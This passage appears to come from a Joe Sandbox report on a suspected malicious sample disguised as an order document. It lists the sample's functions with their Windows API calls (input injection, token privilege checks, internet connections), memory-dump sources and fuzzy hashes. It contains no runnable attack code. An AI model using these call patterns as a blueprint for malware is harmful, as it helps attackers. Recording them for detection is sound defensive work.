                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID:
                      • API String ID: 4218353326-0
                      • Opcode ID: a429c43dfb6ec8edc7ed5e2a2bdeb7e886e51bb3d7c0e98f87aeb4173162a61e
                      • Instruction ID: 4f6367db9f8e3edf7f392bcd8b8c4dc68d4609512d3e21dff432bcfce3af9523
                      • Opcode Fuzzy Hash: a429c43dfb6ec8edc7ed5e2a2bdeb7e886e51bb3d7c0e98f87aeb4173162a61e
                      • Instruction Fuzzy Hash: 2A41B535A00208AFCB14FBA4DCD5FBEB7A9AF85354F148169F91AA7392DB30AD05C750
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009EBB09
                      • GetLastError.KERNEL32(?,00000000), ref: 009EBB2F
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009EBB54
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009EBB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: f1800205ae49b9134e209995ca897113d820e97b6e65a1e2be7a66a7948f4a1f
                      • Instruction ID: c4b79caf088dd062f2dd241b9dc3ce7e3efced1415ae74140754ebd36e4ea246
                      • Opcode Fuzzy Hash: f1800205ae49b9134e209995ca897113d820e97b6e65a1e2be7a66a7948f4a1f
                      • Instruction Fuzzy Hash: 1C411D39200650DFCF11EF59C585A6DBBE5EF89310B198498EC4A9B762CB35FD02CB91
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A08B4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: e10a40d190e19f779a8fa4f579f261fe8a1e66309f34b2597976c87de91f78bc
                      • Instruction ID: 86bcd472f3f728772aa69926c1e9c89dd8d186bdc153d65e1675dbba42b937aa
                      • Opcode Fuzzy Hash: e10a40d190e19f779a8fa4f579f261fe8a1e66309f34b2597976c87de91f78bc
                      • Instruction Fuzzy Hash: 2C31E1B460020CBFEB209B58EC95FAD3BA4EB07350F244512FA91D62E0CE39A9418759
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00A0AE1A
                      • GetWindowRect.USER32(?,?), ref: 00A0AE90
                      • PtInRect.USER32(?,?,00A0C304), ref: 00A0AEA0
                      • MessageBeep.USER32(00000000), ref: 00A0AF11
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: f424482c7fc42ed133814cd19b0495d931cd0b124d7226c13f4dfe7eae668cc2
                      • Instruction ID: 992f52ddaa27cffb7cd309925b121677d5d09d51e94bd0eba2c0ca7043e59b09
                      • Opcode Fuzzy Hash: f424482c7fc42ed133814cd19b0495d931cd0b124d7226c13f4dfe7eae668cc2
                      • Instruction Fuzzy Hash: B441807460032DDFCB11CF98E884B997BF5FF99740F2481A9E4149B291D731A842CF92
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009E1037
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 009E1053
                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009E10B9
                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009E110B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                      • Instruction ID: 2b08e152b3092f07bb049bc5df60e7f64d19acae71f7e5423581989665c31744
                      • Opcode Fuzzy Hash: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                      • Instruction Fuzzy Hash: 08317830E446C8AEFF32CB678C05BFABBADAB84322F08421AE590521D0C3798DC58751
                      APIs
                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009E1176
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 009E1192
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 009E11F1
                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009E1243
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                      • Instruction ID: 72eb5dfd4d5a86a1b002aa1cd2ba893349e095f46f08fd5c656d69b28a4b0c7b
                      • Opcode Fuzzy Hash: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                      • Instruction Fuzzy Hash: 2E314830A4428C5EEF36CAA78C047FA7BAEAB89310F04431AE691926D1C3785D958751
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B644B
                      • __isleadbyte_l.LIBCMT ref: 009B6479
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B64A7
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B64DD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: 387fcd7487023b9d00dffd920d45c0099bed09e0989906dad70ff297fd7f1ba0
                      • Instruction ID: 96294e307f387e0e6a016f03514f1e7b91101cbfc9cdab9f583daa029d4cb032
                      • Opcode Fuzzy Hash: 387fcd7487023b9d00dffd920d45c0099bed09e0989906dad70ff297fd7f1ba0
                      • Instruction Fuzzy Hash: C731EF3160064AAFDB21CF64CA44BFB7BAAFF41320F154429F854871A0EB39E851DB90
                      APIs
                      • GetForegroundWindow.USER32 ref: 00A05189
                        • Part of subcall function 009E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009E3897
                        • Part of subcall function 009E387D: GetCurrentThreadId.KERNEL32 ref: 009E389E
                        • Part of subcall function 009E387D: AttachThreadInput.USER32(00000000,?,009E52A7), ref: 009E38A5
                      • GetCaretPos.USER32(?), ref: 00A0519A
                      • ClientToScreen.USER32(00000000,?), ref: 00A051D5
                      • GetForegroundWindow.USER32 ref: 00A051DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: fa7801b569ec8bd72af93a10d495590eaecf14c4f58b1a80903bd76d04f70b78
                      • Instruction ID: e3a511ecdafcdecb32886faa9d37a50e380ed6a2626ca2c0cc56d3d78708e60b
                      • Opcode Fuzzy Hash: fa7801b569ec8bd72af93a10d495590eaecf14c4f58b1a80903bd76d04f70b78
                      • Instruction Fuzzy Hash: 66310C71D00108AFDB14EFA5C985AEFB7F9EF98304F14406AE816E7251EA759E05CBA0
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • GetCursorPos.USER32(?), ref: 00A0C7C2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009BBBFB,?,?,?,?,?), ref: 00A0C7D7
                      • GetCursorPos.USER32(?), ref: 00A0C824
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009BBBFB,?,?,?), ref: 00A0C85E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: 5041640192d4dbfa336ae80be0c0065b2610f1a661aeffcff7cf8ea2eae190ec
                      • Instruction ID: 65df30f34fd3071a97d05c8ba36d7e6038b5c7cb34ee3cd1d635bbb557bbabcf
                      • Opcode Fuzzy Hash: 5041640192d4dbfa336ae80be0c0065b2610f1a661aeffcff7cf8ea2eae190ec
                      • Instruction Fuzzy Hash: 9031D83550001CAFCB25CF98DC98EEA7BB5EF4A320F044165F905972A1D7315D51DF64
                      APIs
                        • Part of subcall function 009D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8669
                        • Part of subcall function 009D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D8673
                        • Part of subcall function 009D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8682
                        • Part of subcall function 009D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8689
                        • Part of subcall function 009D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D869F
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009D8BEB
                      • _memcmp.LIBCMT ref: 009D8C0E
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D8C44
                      • HeapFree.KERNEL32(00000000), ref: 009D8C4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: fb4ce0dbc5c18491027392182528ab06ee8b16890ba4cdba8991987c421806de
                      • Instruction ID: 79901ee3811984974f3c1078bd847dfe5f53337f60b93752c03476351a3149b1
                      • Opcode Fuzzy Hash: fb4ce0dbc5c18491027392182528ab06ee8b16890ba4cdba8991987c421806de
                      • Instruction Fuzzy Hash: A8218171E51209EFDB10DFA4C945BEEB7B8EF44354F14805AE554A7341EB31AE06CB60
                      APIs
                      • __setmode.LIBCMT ref: 009A0BF2
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0
                      • _fprintf.LIBCMT ref: 009A0C29
                      • OutputDebugStringW.KERNEL32(?), ref: 009D6331
                        • Part of subcall function 009A4CDA: _flsall.LIBCMT ref: 009A4CF3
                      • __setmode.LIBCMT ref: 009A0C5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                      • String ID:
                      • API String ID: 521402451-0
                      • Opcode ID: 606081b25a7c7f3ea6c87172def86c3203c4ed12a6c5ec22bde000214d6daa59
                      • Instruction ID: 07b189023f1938074d5d2991750824d755be973cc287e22d88c421de4e3df164
                      • Opcode Fuzzy Hash: 606081b25a7c7f3ea6c87172def86c3203c4ed12a6c5ec22bde000214d6daa59
                      • Instruction Fuzzy Hash: 6111E4329042087FCB05B7B8AC47ABEBB6D9FC6320F14411AF20497292DEA55D9687D5
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F1A97
                        • Part of subcall function 009F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F1B40
                        • Part of subcall function 009F1B21: InternetCloseHandle.WININET(00000000), ref: 009F1BDD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Internet$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 1463438336-0
                      • Opcode ID: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
                      • Instruction ID: 6ce24d5701157125a71590e5af4ac146ac31e82dcabb96724d539d3dc65744d9
                      • Opcode Fuzzy Hash: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
                      • Instruction Fuzzy Hash: 2C21A135200609FFDB269F608C01FBBB7ADFF84701F10041AFB11A6661EB71E8129BA1
                      APIs
                        • Part of subcall function 009DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009DE1C4,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?), ref: 009DF5BC
                        • Part of subcall function 009DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 009DF5E2
                        • Part of subcall function 009DF5AD: lstrcmpiW.KERNEL32(00000000,?,009DE1C4,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?), ref: 009DF613
                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009DE1DD
                      • lstrcpyW.KERNEL32(00000000,?), ref: 009DE203
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,009DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009DE237
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 82092eb6ded5b243ab7f8eb970aae067f580282cd7dc66ee75c1cad2e0ddb14d
                      • Instruction ID: 1b966deecf331fc089f57353a18e7ea87d40bc7f0bfb7b61fd467dd87ef66128
                      • Opcode Fuzzy Hash: 82092eb6ded5b243ab7f8eb970aae067f580282cd7dc66ee75c1cad2e0ddb14d
                      • Instruction Fuzzy Hash: F8118E36240345EFCB25AF64DC45A7A77BCFF85350B40812BF926CB260EB71A85297A0
                      APIs
                      • _free.LIBCMT ref: 009B5351
                        • Part of subcall function 009A594C: __FF_MSGBANNER.LIBCMT ref: 009A5963
                        • Part of subcall function 009A594C: __NMSG_WRITE.LIBCMT ref: 009A596A
                        • Part of subcall function 009A594C: RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: b26b04ece977db89bb2e8f84a9c64cbd93c93b6755e93b582dcfbc50f86a367e
                      • Instruction ID: 54673462a9d80a5309181e2d2873ee1364fcc400c435bef0787c1610ee9f2c4c
                      • Opcode Fuzzy Hash: b26b04ece977db89bb2e8f84a9c64cbd93c93b6755e93b582dcfbc50f86a367e
                      • Instruction Fuzzy Hash: 1311E772904A19EFCB313F74AD0579E37D85F563B0B214429F904AA291DFB5894197D0
                      APIs
                      • _memset.LIBCMT ref: 00984560
                        • Part of subcall function 0098410D: _memset.LIBCMT ref: 0098418D
                        • Part of subcall function 0098410D: _wcscpy.LIBCMT ref: 009841E1
                        • Part of subcall function 0098410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009841F1
                      • KillTimer.USER32(?,00000001,?,?), ref: 009845B5
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009845C4
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009BD6CE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                      • String ID:
                      • API String ID: 1378193009-0
                      • Opcode ID: d6c274983f1d48ff3a714af8fe0915c0dbce1443289bb9eae8f0f2606e415947
                      • Instruction ID: 47ae4daec5c8b3935bda94cd289c46a7cde388553afd89f66bb1f206c8d5ed3c
                      • Opcode Fuzzy Hash: d6c274983f1d48ff3a714af8fe0915c0dbce1443289bb9eae8f0f2606e415947
                      • Instruction Fuzzy Hash: 7D213B70905788EFEB32DB64CC45BEBBBEC9F01318F04009EE69E96241D7B51A85CB51
                      APIs
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
                        • Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0
                      • gethostbyname.WSOCK32(?,?,?), ref: 009F66AC
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F66B7
                      • _memmove.LIBCMT ref: 009F66E4
                      • inet_ntoa.WSOCK32(?), ref: 009F66EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: a519910be8515fac781123cf1c8463ce88dd83edc6ff28bcedd34be5d204910a
                      • Instruction ID: c4f8b2d6e5299d9a917e7efc02eb2d06f5bb1897ac534f5a2757046693003925
                      • Opcode Fuzzy Hash: a519910be8515fac781123cf1c8463ce88dd83edc6ff28bcedd34be5d204910a
                      • Instruction Fuzzy Hash: CE112E35500509AFCB04FBA4DD86EEEB7B8BF94310B148065F506A7261DF30AE09CBA1
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 009D9043
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D9055
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D906B
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D9086
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
